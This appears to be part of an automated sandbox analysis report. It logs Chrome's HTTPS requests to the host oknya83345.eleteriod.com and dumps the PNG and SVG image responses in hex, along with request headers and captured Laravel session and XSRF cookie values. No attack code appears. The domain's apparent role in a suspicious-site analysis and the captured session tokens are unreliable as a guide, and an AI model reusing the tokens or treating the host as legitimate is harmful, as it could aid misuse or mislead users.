                          2024-05-22 15:57:29 UTC727INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                          Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          56192.168.2.449801188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:27 UTC1464OUTGET /stFVFVBLRUZEe4WD3anWY2WwTjYsy9M2yanojV67aWExa5cPBbBIYHvasqNUwXwEuYef256 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:29 UTC659INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:29 GMT
                          Content-Type: image/png
                          Content-Length: 70712
                          Connection: close
                          Content-Disposition: inline; filename="stFVFVBLRUZEe4WD3anWY2WwTjYsy9M2yanojV67aWExa5cPBbBIYHvasqNUwXwEuYef256"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTtGIqPsZl8wiqhn9bfw1MhlHBur4u4wt04A0qLdfIOv1KwLHlbE2l2cwjp8NsYzXJrqTRVBCkPPKHlaY7fr0aaSEamB8ibipLBWfz7TmfkXnToYgUftWG5ggafvzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e00882bf7438e-EWR
                          2024-05-22 15:57:29 UTC710INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                          Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:29 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:29 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:29 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:29 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:29 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:29 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:29 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:29 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:29 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          57192.168.2.449802188.114.97.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:27 UTC1128OUTGET /ef8d6X647wRncbASI7KK9wvH19moijIGgbX7RvbPNBqe0tonNY6Y78148 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:29 UTC668INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:29 GMT
                          Content-Type: image/svg+xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Content-Disposition: inline; filename="ef8d6X647wRncbASI7KK9wvH19moijIGgbX7RvbPNBqe0tonNY6Y78148"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2BQBo%2Bo9rZ1e7HRmXerDZ5bML%2FYyadfBseVzeV1B282RxyAD8IET1k%2FVU1HftPXkAXNI2mdiMEdnf8NJO0sy2CY1Xif3JPQHBvA%2FyS%2B5I8wzxfedE%2BfZWyXs1Na2tg%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e008849a617bd-EWR
                          2024-05-22 15:57:29 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                          Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                          2024-05-22 15:57:29 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          58192.168.2.449803188.114.97.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:27 UTC1114OUTGET /klTwjvYzK7ZnXdGU0MmXwR8cdFcuUR6piy8Hoa78168 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:28 UTC646INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:28 GMT
                          Content-Type: image/svg+xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Content-Disposition: inline; filename="klTwjvYzK7ZnXdGU0MmXwR8cdFcuUR6piy8Hoa78168"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEaIXfuKtVVC56HjVm0B67vc8p%2BdDw1WxwxMoJ3wB9l%2BFY4TfV2giPuDjVO3483IspyKT%2FBjU2gMqZaZQ6fszQWxOpoXo2XlxlfX1mJ7QnfYNJw9TK3Bot4oFrqYPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e0089df1f42a3-EWR
                          2024-05-22 15:57:28 UTC723INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                          Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                          2024-05-22 15:57:28 UTC1369INData Raw: 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38
                          Data Ascii: 4 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.598
                          2024-05-22 15:57:28 UTC1369INData Raw: 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35 32 20 31 36 2e 32 32 30 35 20 31 32 2e 31 35
                          Data Ascii: 9 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.6952 16.2205 12.15
